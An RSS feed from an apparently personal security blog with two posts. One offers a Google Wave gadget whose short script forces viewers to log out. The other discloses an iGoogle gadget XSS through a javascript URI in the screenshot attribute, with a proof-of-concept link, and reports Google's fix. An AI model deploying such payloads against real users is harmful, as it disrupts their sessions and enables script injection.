<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stuff &#187; xml</title>
	<atom:link href="http://blog.beford.org/tag/xml/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.beford.org</link>
	<description></description>
	<lastBuildDate>Fri, 13 Aug 2010 22:59:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Google Wave &#8211; Make your friends logout gadget</title>
		<link>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/</link>
		<comments>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/#comments</comments>
		<pubDate>Fri, 20 Nov 2009 04:04:14 +0000</pubDate>
		<dc:creator>Fernando</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wave]]></category>
		<category><![CDATA[xml]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://blog.beford.org/?p=58</guid>
		<description><![CDATA[Adding this gadget to any wave will make people log out when they see it: http://beford.org/stuff/waveg.xml The code: &#60;script type="text/javascript"&#62; top.location="https://wave.google.com/wave/logout"; &#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p>Adding this gadget to any wave will make people log out when they see it:</p>
<p><a href="http://beford.org/stuff/waveg.xml">http://beford.org/stuff/waveg.xml</a></p>
<p>The code:</p>
<p><code>&lt;script type="text/javascript"&gt;<br />
top.location="https://wave.google.com/wave/logout";<br />
&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Google Gadgets XSS (IE6/Opera)</title>
		<link>http://blog.beford.org/2007/11/25/google-gadgets-xss-ie6/</link>
		<comments>http://blog.beford.org/2007/11/25/google-gadgets-xss-ie6/#comments</comments>
		<pubDate>Sun, 25 Nov 2007 09:58:23 +0000</pubDate>
		<dc:creator>Fernando</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[ie]]></category>
		<category><![CDATA[xml]]></category>

		<guid isPermaLink="false">http://blog.beford.org/?p=9</guid>
		<description><![CDATA[There is a recent discussion on ha.ckers.org regarding a possible CSRF that could allow an attacker to inject an evil gadget on someobdy else's iGoogle page. After checking the format of the xml file used to define the gadgets properties, &#8230; <a href="http://blog.beford.org/2007/11/25/google-gadgets-xss-ie6/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>There is a recent discussion on <a href="http://ha.ckers.org/blog/20071119/google-gadgets-gaffe/">ha.ckers.org</a> regarding a possible CSRF that could allow an attacker to inject an evil gadget on someobdy else's iGoogle page. After checking the format of the <a href="http://ha.ckers.org/asdf2.xml">xml file</a> used to define the gadgets properties, I noticed a couple of attributes that could be used as point of injections to active content, the <strong>thumbnail</strong> and <strong>screenshot </strong>attribute. Only one of them is vulnerable, the screenshot attribute, by using a javascript URI as value you can execute active content on certain browsers such as IE6. This is a poc that shows an alert with the current document.domain value:</p>
<p><a href="http://www.google.com/ig/adde?moduleurl=http://beford.org/stuff/ig.xml">www.google.com/ig/adde?moduleurl=http://beford.org/stuff/ig.xml</a></p>
<p>I've just notified Google about this, to avoid been a target of this flaw you can switch to Mozilla Firefox (+Noscript), or upgrade to IE7, which is not an option for Windows 2000 users.</p>
<p><strong>Update:</strong> According to a friend, Rafael, Opera users are vulnerable aswell, he sent me an screenshot which you can see here: <a href="http://blog.beford.org/wp-content/uploads/2007/11/ss.jpg" title="Opera Google XSS">Opera Google XSS.</a></p>
<p><strong>Update 2: </strong>Google fixed this on 27 November.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.beford.org/2007/11/25/google-gadgets-xss-ie6/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
